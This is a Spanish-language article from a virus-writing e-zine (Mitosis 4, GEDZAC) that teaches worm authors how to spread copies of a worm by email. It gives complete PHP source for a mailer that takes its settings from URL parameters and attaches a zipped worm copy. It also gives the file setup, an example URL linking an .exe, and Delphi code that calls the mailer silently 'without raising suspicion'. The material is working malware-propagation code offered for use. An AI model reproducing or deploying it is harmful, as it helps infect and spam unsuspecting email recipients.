<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style144 {color: #FFFF00}


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Delphi con motor SMTP en PHP</span></span><span class="style55"><br>
      #Autor: <strong>Pana_Infierno[GEDZAC] <em>&lt;pana_infierno[at]gedzac[dot]com&gt;</em></strong></span><br>
    </p>
</div>
<div align="left" class="style55">
    <p align="justify">Hola a todos escrib&iacute; este peque&ntilde;o articulo para la revista mitosis 4<br>
  Siempre buscamos una buena forma para reproducirnos, bueno esta es la mas efectiva,
      enviar una copia del worm por correo electr&oacute;nico para ello usaremos la funci&oacute;n mail
      que viene con php, para eso necesitamos un servidor para subir nuestro script, 
      b&aacute;sicamente lo que hace el script es recibir los par&aacute;metros que ser&aacute;n llamados desde 
    nuestro worm y ejecutar la funci&oacute;n mail desde el servidor php enviando el correo.Este es el c&oacute;digo fuente del motor smtp php.</p>
    <p class="style66">&lt;?</p>
    <p class="style66">$adjunto=$_GET[&quot;adjunto&quot;]; // recibo el parametro adjunto que es el nombre del archivo adjunto<br>
    $archivo = 'archivo.txt';// aca se guarda el nombre del ultimo archivo que se envio<br>
    //para poder adjuntar datos necesitamos subir el archivo fisico a la <br>
    //misma carpeta donde esta el script</p>
    <p class="style66">//aca leemos el archivo para saber el ultimo nombre<br>
    // Leer archivo texto con el nombre del archivo mas la extension<br>
    $gestor = @fopen(&quot;$archivo&quot;, &quot;r&quot;);<br>
    if ($gestor) {<br>
    while (!feof($gestor)) {<br>
    $bufer = fgets($gestor, 4096);</p>
    <p class="style66"> }<br>
    fclose ($gestor);<br>
    }<br>
    $adjunto=$adjunto.&quot;.zip&quot;;</p>
    <p class="style66">//cambiamos el nombre que existe en el servidor por el nuevo nombre que llega en el parametro<br>
    if (rename($bufer,$adjunto))<br>
    {<br>
    $archivo = 'archivo.txt'; //<br>
    $cuerpo = $adjunto;<br>
    $fp=fopen($archivo,'w');<br>
    fwrite($fp,$cuerpo);<br>
    fclose($fp);<br>
    }<br>
    //entonces tenemos el ultimo nombre guardado</p>
    <p class="style66">$UN_SALTO=&quot;\r\n&quot;;<br>
  $DOS_SALTOS=&quot;\r\n\r\n&quot;;</p>
    <p class="style66">$destinatario= $_GET[&quot;destinatario&quot;];<br>
  $asunto= $_GET[&quot;asunto&quot;];<br>
  $remite= $_GET[&quot;remite&quot;];<br>
  $texto= $_GET[&quot;texto&quot;];<br>
  $link=$_GET[&quot;link&quot;];<br>
  $textolink=$_GET[&quot;textolink&quot;];<br>
  $mensaje=$_GET[&quot;mensaje&quot;];</p>
    <p class="style66">//recibimos todos los parametros</p>
    <p class="style66">//armamos la las cabeceras mime del correo a enviar<br>
  $separador = &quot;_separador_de_trozos_&quot;.md5 (uniqid (rand()));</p>
    <p class="style66">$cabecera = &quot;Date: &quot;.date(&quot;l j F Y, G:i&quot;).$UN_SALTO;<br>
  $cabecera .= &quot;MIME-Version: 1.0&quot;.$UN_SALTO;<br>
  $cabecera .= &quot;From: &quot;.$remitente.&quot;&lt;&quot;.$remite.&quot;&gt;&quot;.$UN_SALTO;<br>
  $cabecera .= &quot;Return-path: &quot;. $remite.$UN_SALTO;<br>
  $cabecera .= &quot;Reply-To: &quot;.$remite.$UN_SALTO;<br>
  $cabecera .=&quot;X-Mailer: PHP/&quot;. phpversion().$UN_SALTO;<br>
  $cabecera .= &quot;Content-Type: multipart/mixed;&quot;.$UN_SALTO;<br>
  $cabecera .= &quot; boundary=$separador&quot;.$DOS_SALTOS;</p>
    <p class="style66">// Parte primera -Mensaje en formato HTML<br>
    # Separador inicial<br>
    $texto =&quot;--$separador&quot;.$UN_SALTO;<br>
    # Encabezado parcial<br>
    $texto .=&quot;Content-Type: text/html; charset=\&quot;ISO-8859-1\&quot;&quot;.$UN_SALTO;<br>
    $texto .=&quot;Content-Transfer-Encoding: 7bit&quot;.$DOS_SALTOS;<br>
    # Contenido de esta parte del mensaje<br>
    $texto .= $mensaje;</p>
    <p class="style66"> # Separador de partes<br>
    </p>
    <p class="style66">$adj2 = $UN_SALTO.&quot;--$separador&quot;.$UN_SALTO;</p>
    <p class="style66"> # Encabezado parcial</p>
    <p class="style66">//$adj2 .=&quot;Content-Type: application/octet-stream; name=\&quot;fotos.zip\&quot;&quot;.$UN_SALTO;<br>
  //$adj2 .=&quot;Content-Disposition: attachment; filename=\&quot;fotos.zip\&quot;&quot;.$UN_SALTO;<br>
  //$adj2 .=&quot;Content-Transfer-Encoding: base64&quot;.$DOS_SALTOS;</p>
    <p class="style66">$adj2 .=&quot;Content-Type: application/octet-stream; name=\&quot;$adjunto\&quot;&quot;.$UN_SALTO;<br>
  $adj2 .=&quot;Content-Disposition: attachment; filename=\&quot;$adjunto\&quot;&quot;.$UN_SALTO;<br>
  $adj2 .=&quot;Content-Transfer-Encoding: base64&quot;.$DOS_SALTOS;</p>
    <p class="style66"> # lectura  del fichero adjunto<br>
    //leemos el archivo para poder adjuntarlo al mail<br>
    $fp = fopen($adjunto, &quot;r&quot;);<br>
    $buff = fread($fp, filesize($adjunto));<br>
    fclose($fp);<br>
    # codificaci&oacute;n del fichero adjunto</p>
    <p class="style66">$adj2 .=chunk_split(base64_encode($buff));</p>
    <p class="style66">// separador final del mensaje</p>
    <p class="style66">$adj2 .=$UN_SALTO.&quot;--$separador&quot;.$UN_SALTO;<br>
    </p>
    <p class="style66">// Uni&oacute;n de las diferentes partes para crear<br>
    // el cuerpo del mensaje<br>
    </p>
    <p class="style66"> $mensaje=$texto.$adj2;</p>
    <p class="style66"> // envio del mensaje</p>
    <p class="style66">//finalmente enviamos el correo</p>
  <p class="style66"> if (mail($destinatario, $asunto, $mensaje,$cabecera))<br>
  { echo &quot;mail enviado&quot;;}<br>
  ?&gt;</p>
    <p>este codigo se corta desde &lt; ? hasta ? &gt; y se pega con un nombre .php entonces en la carpeta necesitamos 3 archivos.</p>
    <p>1.- el script en si<br>
      2.- un file llamado archivo.txt (con el nombre del punto 3)<br>
      3.- un archivo zip que sera el enviado como spam (generalmente una copia del worm)</p>
    <p>para ejecutar el script tenemos la forma mas simple pegar los datos en una url, asi:<br>
      <span class="style144">http://www.gedzac.com/tash/envio.php?destinatario=pana_infierno@nada.com&amp;asunto=asunto del mail&amp;remite=pana_infierno@nada.com&amp;texto=texto del mensaje&amp;link=http://www.gedzac.com/archivo.exe&amp;textolink=fotografia&amp;mensaje=mensaje pagina web&amp;adjunto=archivo</span></p>
    <p>Para ejecutar esto desde delphi sin abrir el navegador se haria asi:<br>
    </p>
    <p class="style66">function ejecutarScriptInternet(cadena: string): String;<br>
    var<br>
    hNet: HINTERNET;<br>
    hUrl: HINTERNET;<br>
    Pagina:pchar;<br>
    begin</p>
    <p class="style66">pagina :=pchar(cadena);</p>
    <p class="style66"> Result := '';<br>
    hNet := InternetOpen('agent', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);<br>
    if (hNet &lt;&gt; nil) then<br>
    begin<br>
    hUrl := InternetOpenUrl(hNet, Pagina, nil, 0, INTERNET_FLAG_RELOAD, 0);<br>
    end;<br>
    end;</p>
    <p>Donde cadena es la url completa<br>
      <span class="style144">http://www.gedzac.com/tash/envio.php?destinatario=pana_infierno@nada.com&amp;asunto=asunto del mail&amp;remite=pana_infierno@nada.com&amp;texto=texto del mensaje&amp;link=http://www.gedzac.com/archivo.exe&amp;textolink=fotografia&amp;mensaje=mensaje pagina web&amp;adjunto=archivo</span></p>
    <p>con esto se hace un envi&oacute; efectivo del correo electr&oacute;nico sin levantar sospechas, sin ventanas emergentes y sin tener que abrir el explorador, el nombre del zip<br>
      a enviar cambiara cada ves que enviemos un nuevo nombre quedando guardado este en el archivo.txt.</p>
    <p>Espero que esta informaci&oacute;n les sea de utilidad.</p>
    <p>saludos a todos mis compa&ntilde;eros de grupo en especial a eCORE.</p>
    <p>&nbsp;</p>
    <p></p>
    <p align="justify"><br>
    </p>
    <p align="right" class="style62">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
